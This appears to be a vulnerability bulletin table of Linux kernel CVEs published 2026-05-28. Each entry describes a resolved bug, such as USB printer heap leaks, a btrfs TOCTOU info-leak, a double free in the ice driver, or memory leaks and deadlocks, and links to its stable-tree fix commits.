https://git.kernel.org/stable/c/5e489c6c47a2ac15edbaca153b9348e42c1eacab |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: btmtk: validate WMT event SKB length before struct access btmtk_usb_hci_wmt_sync() casts the WMT event response SKB data to struct btmtk_hci_wmt_evt (7 bytes) and struct btmtk_hci_wmt_evt_funcc (9 bytes) without first checking that the SKB contains enough data. A short firmware response causes out-of-bounds reads from SKB tailroom. Use skb_pull_data() to validate and advance past the base WMT event header. For the FUNC_CTRL case, pull the additional status field bytes before accessing them. | 2026-05-28 | not yet calculated | CVE-2026-46140 | https://git.kernel.org/stable/c/c411cf1bfde951cfa821809cf4020ba177f76e0c https://git.kernel.org/stable/c/624fb79dadc1b65757986a9d0fdde5c0cf3fe179 https://git.kernel.org/stable/c/70d37a8b9229e394cc17ddad47e90b81d80fcd09 https://git.kernel.org/stable/c/634a4408c0615c523cf7531790f4f14a422b9206 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/xive: fix kmemleak caused by incorrect chip_data lookup The kmemleak reports the following memory leak: Unreferenced object 0xc0000002a7fbc640 (size 64): comm "kworker/8:1", pid 540, jiffies 4294937872 hex dump (first 32 bytes): 01 00 00 00 00 00 00 00 00 00 09 04 00 04 00 00 ................ 00 00 a7 81 00 00 0a c0 00 00 08 04 00 04 00 00 ................ backtrace (crc 177d48f6): __kmalloc_cache_noprof+0x520/0x730 xive_irq_alloc_data.constprop.0+0x40/0xe0 xive_irq_domain_alloc+0xd0/0x1b0 irq_domain_alloc_irqs_parent+0x44/0x6c pseries_irq_domain_alloc+0x1cc/0x354 irq_domain_alloc_irqs_parent+0x44/0x6c msi_domain_alloc+0xb0/0x220 irq_domain_alloc_irqs_locked+0x138/0x4d0 __irq_domain_alloc_irqs+0x8c/0xfc __msi_domain_alloc_irqs+0x214/0x4d8 msi_domain_alloc_irqs_all_locked+0x70/0xf8 pci_msi_setup_msi_irqs+0x60/0x78 __pci_enable_msix_range+0x54c/0x98c pci_alloc_irq_vectors_affinity+0x16c/0x1d4 nvme_pci_enable+0xac/0x9c0 [nvme] nvme_probe+0x340/0x764 [nvme] This occurs when allocating MSI-X vectors for an NVMe device. During allocation the XIVE code creates a struct xive_irq_data and stores it in irq_data->chip_data. When the MSI-X irqdomain is later freed, xive_irq_free_data() is responsible for retrieving this structure and freeing it. However, after commit cc0cc23babc9 ("powerpc/xive: Untangle xive from child interrupt controller drivers"), xive_irq_free_data() retrieves the chip_data using irq_get_chip_data(), which looks up the data through the child domain. This is incorrect because the XIVE-specific irq data is associated with the XIVE (parent) domain. As a result the lookup fails and the allocated struct xive_irq_data is never freed, leading to the kmemleak report shown above. Fix this by retrieving the irq_data from the correct domain using irq_domain_get_irq_data() and then accessing the chip_data via irq_data_get_irq_chip_data(). | 2026-05-28 | not yet calculated | CVE-2026-46141 | https://git.kernel.org/stable/c/2546fb8c9acc8c7512ed4339ce2a982cb7407065 https://git.kernel.org/stable/c/e66ed135cdf23a318e9727dca48f98f7f6142f78 https://git.kernel.org/stable/c/6771c54728c278bf1e4bfdab4fddbbb186e33498 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: libwx: fix VF illegal register access Register WX_CFG_PORT_ST is a PF restricted register. When a VF is initialized, attempting to read this register triggers an illegal register access, which lead to a system hang. When the device is VF, the bus function ID can be obtained directly from the PCI_FUNC(pdev->devfn). | 2026-05-28 | not yet calculated | CVE-2026-46142 | https://git.kernel.org/stable/c/d3bd8040497968f6f5470018724ef7b0df92f707 https://git.kernel.org/stable/c/f6e656f7cea16b638675a2ab7d7e4cf2516c5eb0 https://git.kernel.org/stable/c/33c5bb50b9c40e8451e6aec4487a31d794b98d92 https://git.kernel.org/stable/c/68a007a701bc06fa426507c551ef12514f2e721d https://git.kernel.org/stable/c/694de316f607fe2473d52ca0707e3918e72c1562 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: qcom: q6apm-lpass-dai: Fix multiple graph opens As prepare can be called mulitple times, this can result in multiple graph opens for playback path. This will result in a memory leaks, fix this by adding a check before opening. | 2026-05-28 | not yet calculated | CVE-2026-46143 | https://git.kernel.org/stable/c/3141d8b00cad6d3331953c79060ccc3a0262311b https://git.kernel.org/stable/c/c91b7bcc70346d07f57ef03d1b9a338324e213de https://git.kernel.org/stable/c/7cab9f2ad51c858263da836baebad050a1bc7914 https://git.kernel.org/stable/c/b97493f0f42ab9d882a62466782e1900e481a9d6 https://git.kernel.org/stable/c/69acc488aaf39d0ddf6c3cf0e47c1873d39919a2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/mana: Fix error unwind in mana_ib_create_qp_rss() Sashiko points out that mana_ib_cfg_vport_steering() is leaked, the normal destroy path cleans it up. | 2026-05-28 | not yet calculated | CVE-2026-46144 | https://git.kernel.org/stable/c/190e570cc0fc7f57eacf80d2b854ba54b4dfad6b https://git.kernel.org/stable/c/726af85ea4af750b2f75095e24e3cd99797344cb https://git.kernel.org/stable/c/ab64c63b460bbd0521480bf90d5695783f5e66bc https://git.kernel.org/stable/c/30e8a2f33815d8f51b8f8b829c07af16c671cc27 https://git.kernel.org/stable/c/6aaa978c6b6218cfac15fe1dab17c76fe229ce3f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Avoid potential endless loop in convert_chmap_v3() The convert_chmap_v3() has a loop with its increment size of cs_desc->wLength, but we forgot to validate cs_desc->wLength itself, which may lead to potential endless loop by a malformed descriptor. Add a proper size check to abort the loop for plugging the hole. | 2026-05-28 | not yet calculated | CVE-2026-46146 | https://git.kernel.org/stable/c/e0e3dcf48189603f3865f1a0b799b3b42baae96d https://git.kernel.org/stable/c/4e0ee232ebe3df04874125d7c7f3e6c25ea5483d https://git.kernel.org/stable/c/be09b47ed8677d76962e3240c145502e2ad9f3c8 https://git.kernel.org/stable/c/fa5b19ce69067874b1413f3c2027563bae8c2cb3 https://git.kernel.org/stable/c/6e7247d8f5fefeceb0bb9cc80a5388a636b219cd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: Fix pin leak and publication ordering in __pkvm_init_vcpu() Two bugs exist in the vCPU initialisation path: 1. If a check fails after hyp_pin_shared_mem() succeeds, the cleanup path jumps to 'unlock' without calling unpin_host_vcpu() or unpin_host_sve_state(), permanently leaking pin references on the host vCPU and SVE state pages. Extract a register_hyp_vcpu() helper that performs the checks and the store. When register_hyp_vcpu() returns an error, call unpin_host_vcpu() and unpin_host_sve_state() inline before falling through to the existing 'unlock' label. 2. register_hyp_vcpu() publishes the new vCPU pointer into 'hyp_vm->vcpus[]' with a bare store, allowing a concurrent caller of pkvm_load_hyp_vcpu() to observe a partially initialised vCPU object. Ensure the store uses smp_store_release() and the load uses smp_load_acquire(). While 'vm_table_lock' currently serialises the store and the load, these barriers ensure the reader sees the fully initialised 'hyp_vcpu' object even if there were a lockless path or if the lock's own ordering guarantees were insufficient for nested object initialization. | 2026-05-28 | not yet calculated | CVE-2026-46147 | https://git.kernel.org/stable/c/7d3c27b54253cda91dc4d2c1bfc109c490837ab9 https://git.kernel.org/stable/c/6d69c0ed978f7f0efd053fc98390f25ab77c1aea https://git.kernel.org/stable/c/73b9c1e5da84cd69b1a86e374e450817cd051371 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: microchip-core-qspi: control built-in cs manually The coreQSPI IP supports only a single chip select, which is automagically operated by the hardware - set low when the transmit buffer first gets written to and set high when the number of bytes written to the TOTALBYTES field of the FRAMES register have been sent on the bus. Additional devices must use GPIOs for their chip selects. It was reported to me that if there are two devices attached to this QSPI controller that the in-built chip select is set low while linux tries to access the device attached to the GPIO. This went undetected as the boards that connected multiple devices to the SPI controller all exclusively used GPIOs for chip selects, not relying on the built-in chip select at all. It turns out that this was because the built-in chip select, when controlled automagically, is set low when active and high when inactive, thereby ruling out its use for active-high devices or devices that need to transmit with the chip select disabled. Modify the driver so that it controls chip select directly, retaining the behaviour for mem_ops of setting the chip select active for the entire duration of the transfer in the exec_op callback. For regular transfers, implement the set_cs callback for the core to use. As part of this, the existing setup callback, mchp_coreqspi_setup_op(), is removed. Modifying the CLKIDLE field is not safe to do during operation when there are multiple devices, so this code is removed entirely. Setting the MASTER and ENABLE fields is something that can be done once at probe, it doesn't need to be re-run for each device. Instead the new setup callback sets the built-in chip select to its inactive state for active-low devices, as the reset value of the chip select in software controlled mode is low. | 2026-05-28 | not yet calculated | CVE-2026-46148 | https://git.kernel.org/stable/c/998f43196d732f20f9b71eb6ebd973736c9fa911 https://git.kernel.org/stable/c/ee3c99aa102212ad59dc2c19595515c4a6729307 https://git.kernel.org/stable/c/7672749e1496215e8683ce57cf323119033954cf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: usblp: fix heap leak in IEEE 1284 device ID via short response usblp_ctrl_msg() collapses the usb_control_msg() return value to 0/-errno, discarding the actual number of bytes transferred. A broken printer can complete the GET_DEVICE_ID control transfer short and the driver has no way to know. usblp_cache_device_id_string() reads the 2-byte big-endian length prefix from the response and trusts it (clamped only to the buffer bounds). The buffer is kmalloc(1024) at probe time. A device that sends exactly two bytes (e.g. 0x03 0xFF, claiming a 1023-byte ID) leaves device_id_string[2..1022] holding stale kmalloc heap. That stale data is then exposed: - via the ieee1284_id sysfs attribute (sprintf("%s", buf+2), truncated at the first NUL in the stale heap), and - via the IOCNR_GET_DEVICE_ID ioctl, which copy_to_user()s the full claimed length regardless of NULs, up to 1021 bytes of uninitialized heap, with the leak size chosen by the device. Fix this up by just zapping the buffer with zeros before each request sent to the device. | 2026-05-28 | not yet calculated | CVE-2026-46151 | https://git.kernel.org/stable/c/6e29c32a27218f2dcd4a4e9b0b3c5e7728640698 https://git.kernel.org/stable/c/6d8142141c942c0d8e79343cffda9c44bb1f3f4f https://git.kernel.org/stable/c/8247f52d822180e94ccbfdab91613af386a4e34d https://git.kernel.org/stable/c/522d17e93a85575256894212d10e5a1fa6f36529 https://git.kernel.org/stable/c/7a400c6fe3617e31e690e3f7ca37bb335e0498f3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: 8021q: delete cleared egress QoS mappings vlan_dev_set_egress_priority() currently keeps cleared egress priority mappings in the hash as tombstones. Repeated set/clear cycles with distinct skb priorities therefore accumulate mapping nodes until device teardown and leak memory. Delete mappings when vlan_prio is cleared instead of keeping tombstones. Now that the egress mapping lists are RCU protected, the node can be unlinked safely and freed after a grace period. | 2026-05-28 | not yet calculated | CVE-2026-46153 | https://git.kernel.org/stable/c/a52e122c9e4d56ad9a03b32c915a199276d989c3 https://git.kernel.org/stable/c/7dddc74af369478ba7f9bc136d0fc1dc4570cb66 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: LoongArch: Fix potential ADE in loongson_gpu_fixup_dma_hang() The switch case in loongson_gpu_fixup_dma_hang() may not DC2 or DC3, and readl(crtc_reg) will access with random address, because the "device" is from "base+PCI_DEVICE_ID", "base" is from "pdev->devfn+1". This is wrong when my platform inserts a discrete GPU: lspci -tv -[0000:00]-+-00.0 Loongson Technology LLC Hyper Transport Bridge Controller ... +-06.0 Loongson Technology LLC LG100 GPU +-06.2 Loongson Technology LLC Device 7a37 ... Add a default switch case to fix the panic as below: Kernel ade access[#1]: CPU: 0 PID: 1 Comm: swapper/0 Not tainted 6.6.136-loong64-desktop-hwe+ #4 pc 90000000017e5534 ra 90000000017e54c0 tp 90000001002f8000 sp 90000001002fb6c0 a0 80000efe00003100 a1 0000000000003100 a2 0000000000000000 a3 0000000000000002 a4 90000001002fb6b4 a5 900000087cdb58fd a6 90000000027af000 a7 0000000000000001 t0 00000000000085b9 t1 000000000000ffff t2 0000000000000000 t3 0000000000000000 t4 fffffffffffffffd t5 00000000fffb6d9c t6 0000000000083b00 t7 00000000000070c0 t8 900000087cdb4d94 u0 900000087cdb58fd s9 90000001002fb826 s0 90000000031c12c8 s1 7fffffffffffff00 s2 90000000031c12d0 s3 0000000000002710 s4 0000000000000000 s5 0000000000000000 s6 9000000100053000 s7 7fffffffffffff00 s8 90000000030d4000 ra: 90000000017e54c0 loongson_gpu_fixup_dma_hang+0x40/0x210 ERA: 90000000017e5534 loongson_gpu_fixup_dma_hang+0xb4/0x210 CRMD: 000000b0 (PLV0 -IE -DA +PG DACF=CC DACM=CC -WE) PRMD: 00000004 (PPLV0 +PIE -PWE) EUEN: 00000000 (-FPE -SXE -ASXE -BTE) ECFG: 00071c1d (LIE=0,2-4,10-12 VS=7) ESTAT: 00480000 [ADEM] (IS= ECode=8 EsubCode=1) BADV: 7fffffffffffff00 PRID: 0014d000 (Loongson-64bit, Loongson-3A6000-HV) Modules linked in: Process swapper/0 (pid: 1, threadinfo=(____ptrval____), task=(____ptrval____)) Stack : 0000000000000006 90000001002fb778 90000001002fb704 0000000000000007 0000000016a65700 90000000017e5690 000000000000ffff ffffffffffffffff 900000000209f7c0 9000000100053000 900000000209f7a8 9000000000eebc08 0000000000000000 0000000000000000 0000000000000006 90000001002fb778 90000001000530b8 90000000027af000 0000000000000000 9000000100054000 9000000100053000 9000000000ebb70c 9000000100004c00 9000000004000001 90000001002fb7e4 bae765461f31cb12 0000000000000000 0000000000000000 0000000000000006 90000000027af000 0000000000000030 90000000027af000 900000087cd6f800 9000000100053000 0000000000000000 9000000000ebc560 7a2500147cdaf720 bae765461f31cb12 0000000000000001 0000000000000030 ... Call Trace: [<90000000017e5534>] loongson_gpu_fixup_dma_hang+0xb4/0x210 [<9000000000eebc08>] pci_fixup_device+0x108/0x280 [<9000000000ebb70c>] pci_setup_device+0x24c/0x690 [<9000000000ebc560>] pci_scan_single_device+0xe0/0x140 [<9000000000ebc684>] pci_scan_slot+0xc4/0x280 [<9000000000ebdd00>] pci_scan_child_bus_extend+0x60/0x3f0 [<9000000000f5bc94>] acpi_pci_root_create+0x2b4/0x420 [<90000000017e5e74>] pci_acpi_scan_root+0x2d4/0x440 [<9000000000f5b02c>] acpi_pci_root_add+0x21c/0x3a0 [<9000000000f4ee54>] acpi_bus_attach+0x1a4/0x3c0 [<90000000010e200c>] device_for_each_child+0x6c/0xe0 [<9000000000f4bbf4>] acpi_dev_for_each_child+0x44/0x70 [<9000000000f4ef40>] acpi_bus_attach+0x290/0x3c0 [<90000000010e200c>] device_for_each_child+0x6c/0xe0 [<9000000000f4bbf4>] acpi_dev_for_each_child+0x44/0x70 [<9000000000f4ef40>] acpi_bus_attach+0x290/0x3c0 [<9000000000f5211c>] acpi_bus_scan+0x6c/0x280 [<900000000189c028>] acpi_scan_init+0x194/0x310 [<900000000189bc6c>] acpi_init+0xcc/0x140 [<9000000000220cdc>] do_one_initcall+0x4c/0x310 [<90000000018618fc>] kernel_init_freeable+0x258/0x2d4 [<900000000184326c>] kernel_init+0x28/0x13c [<9000000000222008>] ret_from_kernel_thread+0xc/0xa4 | 2026-05-28 | not yet calculated | CVE-2026-46156 | https://git.kernel.org/stable/c/07d190e4ec689d6478f7f5e36099fb9bf457e7c5 https://git.kernel.org/stable/c/2cb19b06c09983727573bbe7d7430cbad480a714 https://git.kernel.org/stable/c/9e1aed63a5552958ef2a9bfd699a3f990e52a77f https://git.kernel.org/stable/c/81fef1c278436e6bd68ee4ca05a0acb96e256561 https://git.kernel.org/stable/c/8dfa2f8780e486d05b9a0ffce70b8f5fbd62053e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: pm: ADD_ADDR rtx: always decrease sk refcount When an ADD_ADDR is retransmitted, the sk is held in sk_reset_timer(). It should then be released in all cases at the end. Some (unlikely) checks were returning directly instead of calling sock_put() to decrease the refcount. Jump to a new 'exit' label to call __sock_put() (which will become sock_put() in the next commit) to fix this potential leak. While at it, drop the '!msk' check which cannot happen because it is never reset, and explicitly mark the remaining one as "unlikely". | 2026-05-28 | not yet calculated | CVE-2026-46158 | https://git.kernel.org/stable/c/acd3d3562315c99f3c0db16f0fcc5f0306638982 https://git.kernel.org/stable/c/25e37407442b8766ec2cf52fb4e31b5c3d3aeeae https://git.kernel.org/stable/c/9634cb35af17019baec21ca648516ce376fa10e6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix btrfs_ioctl_space_info() slot_count TOCTOU which can lead to info-leak btrfs_ioctl_space_info() has a TOCTOU race between two passes over the block group RAID type lists. The first pass counts entries to determine the allocation size, then the second pass fills the buffer. The groups_sem rwlock is released between passes, allowing concurrent block group removal to reduce the entry count. When the second pass fills fewer entries than the first pass counted, copy_to_user() copies the full alloc_size bytes including trailing uninitialized kmalloc bytes to userspace. Fix by copying only total_spaces entries (the actually-filled count from the second pass) instead of alloc_size bytes, and switch to kzalloc so any future copy size mismatch cannot leak heap data. | 2026-05-28 | not yet calculated | CVE-2026-46159 | https://git.kernel.org/stable/c/f5ee467b56764964027c361641f64953fc0f8f9a https://git.kernel.org/stable/c/4fdc6ee0802121d9cd96b8d085e589f51e5a4ec3 https://git.kernel.org/stable/c/5d12e0ab009ade48c1bff9324fd9bea2c773d088 https://git.kernel.org/stable/c/d09d67d5de577cedae3de9497dff217e0ac8b641 https://git.kernel.org/stable/c/973e57c726c1f8e77259d1c8e519519f1e9aea77 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix missing last_unlink_trans update when removing a directory When removing a directory we are not updating its last_unlink_trans field, which can result in incorrect fsync behaviour in case some one fsyncs the directory after it was removed because it's holding a file descriptor on it. Example scenario: mkdir /mnt/dir1 mkdir /mnt/dir1/dir2 mkdir /mnt/dir3 sync -f /mnt # Do some change to the directory and fsync it. chmod 700 /mnt/dir1 xfs_io -c fsync /mnt/dir1 # Move dir2 out of dir1 so that dir1 becomes empty. mv /mnt/dir1/dir2 /mnt/dir3/ open fd on /mnt/dir1 call rmdir(2) on path "/mnt/dir1" fsync fd <trigger power failure> When attempting to mount the filesystem, the log replay will fail with an -EIO error and dmesg/syslog has the following: [445771.626482] BTRFS info (device dm-0): first mount of filesystem 0368bbea-6c5e-44b5-b409-09abe496e650 [445771.626486] BTRFS info (device dm-0): using crc32c checksum algorithm [445771.627912] BTRFS info (device dm-0): start tree-log replay [445771.628335] page: refcount:2 mapcount:0 mapping:0000000061443ddc index:0x1d00 pfn:0x7072a5 [445771.629453] memcg:ffff89f400351b00 [445771.629892] aops:btree_aops [btrfs] ino:1 [445771.630737] flags: 0x17fffc00000402a(uptodate|lru|private|writeback|node=0|zone=2|lastcpupid=0x1ffff) [445771.632359] raw: 017fffc00000402a fffff47284d950c8 fffff472907b7c08 ffff89f458e412b8 [445771.633713] raw: 0000000000001d00 ffff89f6c51d1a90 00000002ffffffff ffff89f400351b00 [445771.635029] page dumped because: eb page dump [445771.635825] BTRFS critical (device dm-0): corrupt leaf: root=5 block=30408704 slot=10 ino=258, invalid nlink: has 2 expect no more than 1 for dir [445771.638088] BTRFS info (device dm-0): leaf 30408704 gen 10 total ptrs 17 free space 14878 owner 5 [445771.638091] BTRFS info (device dm-0): refs 4 lock_owner 0 current 3581087 [445771.638094] item 0 key (256 INODE_ITEM 0) itemoff 16123 itemsize 160 [445771.638097] inode generation 3 transid 9 size 16 nbytes 16384 [445771.638098] block group 0 mode 40755 links 1 uid 0 gid 0 [445771.638100] rdev 0 sequence 2 flags 0x0 [445771.638102] atime 1775744884.0 [445771.660056] ctime 1775744885.645502983 [445771.660058] mtime 1775744885.645502983 [445771.660060] otime 1775744884.0 [445771.660062] item 1 key (256 INODE_REF 256) itemoff 16111 itemsize 12 [445771.660064] index 0 name_len 2 [445771.660066] item 2 key (256 DIR_ITEM 1843588421) itemoff 16077 itemsize 34 [445771.660068] location key (259 1 0) type 2 [445771.660070] transid 9 data_len 0 name_len 4 [445771.660075] item 3 key (256 DIR_ITEM 2363071922) itemoff 16043 itemsize 34 [445771.660076] location key (257 1 0) type 2 [445771.660077] transid 9 data_len 0 name_len 4 [445771.660078] item 4 key (256 DIR_INDEX 2) itemoff 16009 itemsize 34 [445771.660079] location key (257 1 0) type 2 [445771.660080] transid 9 data_len 0 name_len 4 [445771.660081] item 5 key (256 DIR_INDEX 3) itemoff 15975 itemsize 34 [445771.660082] location key (259 1 0) type 2 [445771.660083] transid 9 data_len 0 name_len 4 [445771.660084] item 6 key (257 INODE_ITEM 0) itemoff 15815 itemsize 160 [445771.660086] inode generation 9 transid 9 size 8 nbytes 0 [445771.660087] block group 0 mode 40777 links 1 uid 0 gid 0 [445771.660088] rdev 0 sequence 2 flags 0x0 [445771.660089] atime 1775744885.641174097 [445771.660090] ctime 1775744885.645502983 [445771.660091] mtime 1775744885.645502983 [445771.660105] otime 1775744885.641174097 [445771.660106] item 7 key (257 INODE_REF 256) itemoff 15801 itemsize 14 [445771.660107] index 2 name_len 4 [445771.660108] item 8 key (257 DIR_ITEM 2676584006) itemoff 15767 itemsize 34 [445771.660109] location key (2 ---truncated--- | 2026-05-28 | not yet calculated | CVE-2026-46160 | https://git.kernel.org/stable/c/cc3c0a0f965754ce230d93ba44ee5b34fbe6138a https://git.kernel.org/stable/c/aa9c3ecaf7337df3a689318584f879b5339ede0f https://git.kernel.org/stable/c/fb388eb58c1ba047ccabc33901839acfecadcf49 https://git.kernel.org/stable/c/36fcc2c7517f8a86379154c9793f867592aa8b7e https://git.kernel.org/stable/c/999757231c49376cd1a37308d2c8c4c9932571e1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid10: fix divide-by-zero in setup_geo() with zero far_copies setup_geo() extracts near_copies (nc) and far_copies (fc) from the user-provided layout parameter without checking for zero. When fc=0 with the "improved" far set layout selected, 'geo->far_set_size = disks / fc' triggers a divide-by-zero. Validate nc and fc immediately after extraction, returning -1 if either is zero. | 2026-05-28 | not yet calculated | CVE-2026-46161 | https://git.kernel.org/stable/c/4af2e558e6fdfb972c61350653fd55d1f62b60a5 https://git.kernel.org/stable/c/9d8e03b9a2b1e8ce5c198bf3a409a629f4d02cda https://git.kernel.org/stable/c/913d556e4bd1b56ed822815655b82c7bb54edc51 https://git.kernel.org/stable/c/f9ddb621b2325eb69c95692958daf2bab4dea2c4 https://git.kernel.org/stable/c/9aa6d860b0930e2f72795665c42c44252a558a0c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ice: fix double free in ice_sf_eth_activate() error path When auxiliary_device_add() fails, ice_sf_eth_activate() jumps to aux_dev_uninit and calls auxiliary_device_uninit(&sf_dev->adev). The device release callback ice_sf_dev_release() frees sf_dev, but the current error path falls through to sf_dev_free and calls kfree(sf_dev) again, causing a double free. Keep kfree(sf_dev) for the auxiliary_device_init() failure path, but avoid falling through to sf_dev_free after auxiliary_device_uninit(). | 2026-05-28 | not yet calculated | CVE-2026-46162 | https://git.kernel.org/stable/c/2ca30340b5028ddc3f17086a538feeff06167b1b https://git.kernel.org/stable/c/121d1f253aed515cd85748f68c664a6cb756e8ad https://git.kernel.org/stable/c/d0c6a4816609f145ffcc74e64baa214c571c17c6 https://git.kernel.org/stable/c/9aab1c3d7299285e2569cbc0ed5892d631a241b2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: b43legacy: enforce bounds check on firmware key index in RX path Same fix as b43: the firmware-controlled key index in b43legacy_rx() can exceed dev->max_nr_keys. The existing B43legacy_WARN_ON is non-enforcing in production builds, allowing an out-of-bounds read of dev->key[]. Make the check enforcing by dropping the frame for invalid indices. | 2026-05-28 | not yet calculated | CVE-2026-46163 | https://git.kernel.org/stable/c/1baaeb6adecb9691748c0253dab6ddd19a2b4e9e https://git.kernel.org/stable/c/6ee946077607d7783ae6709a899213fc4fe08f35 https://git.kernel.org/stable/c/9d1bc155802943e92c57a5fb923d23edfbf0b525 https://git.kernel.org/stable/c/fdd4e51979f42ca8b1ab7e6176b607e1caabf2a5 https://git.kernel.org/stable/c/a035766f970bde2d4298346a31a80685be5c0205 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: openvswitch: vport: fix self-deadlock on release of tunnel ports vports are used concurrently and protected by RCU, so netdev_put() must happen after the RCU grace period. So, either in an RCU call or after the synchronize_net(). The rtnl_delete_link() must happen under RTNL and so can't be executed in RCU context. Calling synchronize_net() while holding RTNL is not a good idea for performance and system stability under load in general, so calling netdev_put() in RCU call is the right solution here. However, when the device is deleted, rtnl_unlock() will call netdev_run_todo() and block until all the references are gone. In the current code this means that we never reach the call_rcu() and the vport is never freed and the reference is never released, causing a self-deadlock on device removal. Fix that by moving the rcu_call() before the rtnl_unlock(), so the scheduled RCU callback will be executed when synchronize_net() is called from the rtnl_unlock()->netdev_run_todo() while the RTNL itself is already released. | 2026-05-28 | not yet calculated | CVE-2026-46165 | https://git.kernel.org/stable/c/c741433f6c8dcdecd1d9549d89053761fd1ea413 https://git.kernel.org/stable/c/6522d59fb7de55ce0f0f285d962243ddffebb01f https://git.kernel.org/stable/c/3df75fff46b1517eb479d8e6b8e3500763715dd0 https://git.kernel.org/stable/c/366c482965c673565ecb8bcfb15d5548f13a6a10 https://git.kernel.org/stable/c/aa69918bd418e700309fdd08509dba324fb24296 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: usblp: fix uninitialized heap leak via LPGETSTATUS ioctl Just like in a previous problem in this driver, usblp_ctrl_msg() will collapse the usb_control_msg() return value to 0/-errno, discarding the actual number of bytes transferred. Ideally that short command should be detected and error out, but many printers are known to send "incorrect" responses back so we can't just do that. statusbuf is kmalloc(8) at probe time and never filled before the first LPGETSTATUS ioctl. usblp_read_status() requests 1 byte. If a malicious printer responds with zero bytes, *statusbuf is one byte of stale kmalloc heap, sign-extended into the local int status, which the LPGETSTATUS path then copy_to_user()s directly to the ioctl caller. Fix this all by just zapping out the memory buffer when allocated at probe time. If a later call does a short read, the data will be identical to what the device sent it the last time, so there is no "leak" of information happening. | 2026-05-28 | not yet calculated | CVE-2026-46167 | https://git.kernel.org/stable/c/d06d937b0a4cdb8867f04275c8100a8b943da31a https://git.kernel.org/stable/c/a502b997668401a6821501fc98b7f9220f9b6ff2 https://git.kernel.org/stable/c/762a6ccf391db0d629e590a803a3a2231e17dd3f https://git.kernel.org/stable/c/6b0e7438e31c74b01514d31ff35c1e688c4baaba https://git.kernel.org/stable/c/b38e53cbfb9d84732e5984fbd73e128d592415c5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: fix scheduling with atomic in timestamp sockopt Using lock_sock_fast() (atomic context) around sock_set_timestamp() and sock_set_timestamping() is unsafe, as both helpers can sleep. Replace lock_sock_fast() with sleepable lock_sock()/release_sock() to avoid scheduling while atomic panic. | 2026-05-28 | not yet calculated | CVE-2026-46168 | https://git.kernel.org/stable/c/ebeb70e29e37cfce899309cc2665a3bfe960ed94 https://git.kernel.org/stable/c/b157dab93a7af44a84e78cf0cb311dde475cff5b https://git.kernel.org/stable/c/8a005fe451c73fd2b3d1faa5643c11e6bd07acfc https://git.kernel.org/stable/c/7eb513b42721bee4b96da69f6188d5a7783f210d https://git.kernel.org/stable/c/b5c52908d52c6c8eb8933264aa6087a0600fd892 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix uninit-value by validating catalog record size Syzbot reported a KMSAN uninit-value issue in hfsplus_strcasecmp(). The root cause is that hfs_brec_read() doesn't validate that the on-disk record size matches the expected size for the record type being read. When mounting a corrupted filesystem, hfs_brec_read() may read less data than expected. For example, when reading a catalog thread record, the debug output showed: HFSPLUS_BREC_READ: rec_len=520, fd->entrylength=26 HFSPLUS_BREC_READ: WARNING - entrylength (26) < rec_len (520) - PARTIAL READ! hfs_brec_read() only validates that entrylength is not greater than the buffer size, but doesn't check if it's less than expected. It successfully reads 26 bytes into a 520-byte structure and returns success, leaving 494 bytes uninitialized. This uninitialized data in tmp.thread.nodeName then gets copied by hfsplus_cat_build_key_uni() and used by hfsplus_strcasecmp(), triggering the KMSAN warning when the uninitialized bytes are used as array indices in case_fold(). Fix by introducing hfsplus_brec_read_cat() wrapper that: 1. Calls hfs_brec_read() to read the data 2. Validates the record size based on the type field: - Fixed size for folder and file records - Variable size for thread records (depends on string length) 3. Returns -EIO if size doesn't match expected For thread records, check against HFSPLUS_MIN_THREAD_SZ before reading nodeName.length to avoid reading uninitialized data at call sites that don't zero-initialize the entry structure. Also initialize the tmp variable in hfsplus_find_cat() as defensive programming to ensure no uninitialized data even if validation is bypassed. | 2026-05-28 | not yet calculated | CVE-2026-46169 | https://git.kernel.org/stable/c/61a790974ff7e533acbceca06c7d02f22bf96d4d https://git.kernel.org/stable/c/c91bbd6193c70a02c50c22e0fb1f60c3c5bd053a https://git.kernel.org/stable/c/a420904450962a562ad053a41a53a27755021b48 https://git.kernel.org/stable/c/93e8d613f1a01b6637f387cc93f184cf7fb881d6 https://git.kernel.org/stable/c/b6b592275aeff184aa82fcf6abccd833fb71b393 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: pm: ADD_ADDR rtx: free sk if last When an ADD_ADDR is retransmitted, the sk is held in sk_reset_timer(), and released at the end. If at that moment, it was the last reference being held, the sk would not be freed. sock_put() should then be called instead of __sock_put(). But that's not enough: if it is the last reference, sock_put() will call sk_free(), which will end up calling sk_stop_timer_sync() on the same timer, and waiting indefinitely to finish. So it is needed to mark that the timer is done at the end of the timer handler when it has not been rescheduled, not to call sk_stop_timer_sync() on "itself". | 2026-05-28 | not yet calculated | CVE-2026-46170 | https://git.kernel.org/stable/c/b74ad20198652b6b39a761c277ba65ae82b1e107 https://git.kernel.org/stable/c/8143a224785ceaf2b0856e08d4498916f38228fb https://git.kernel.org/stable/c/b7b9a461569734d33d3259d58d2507adfac107ed |
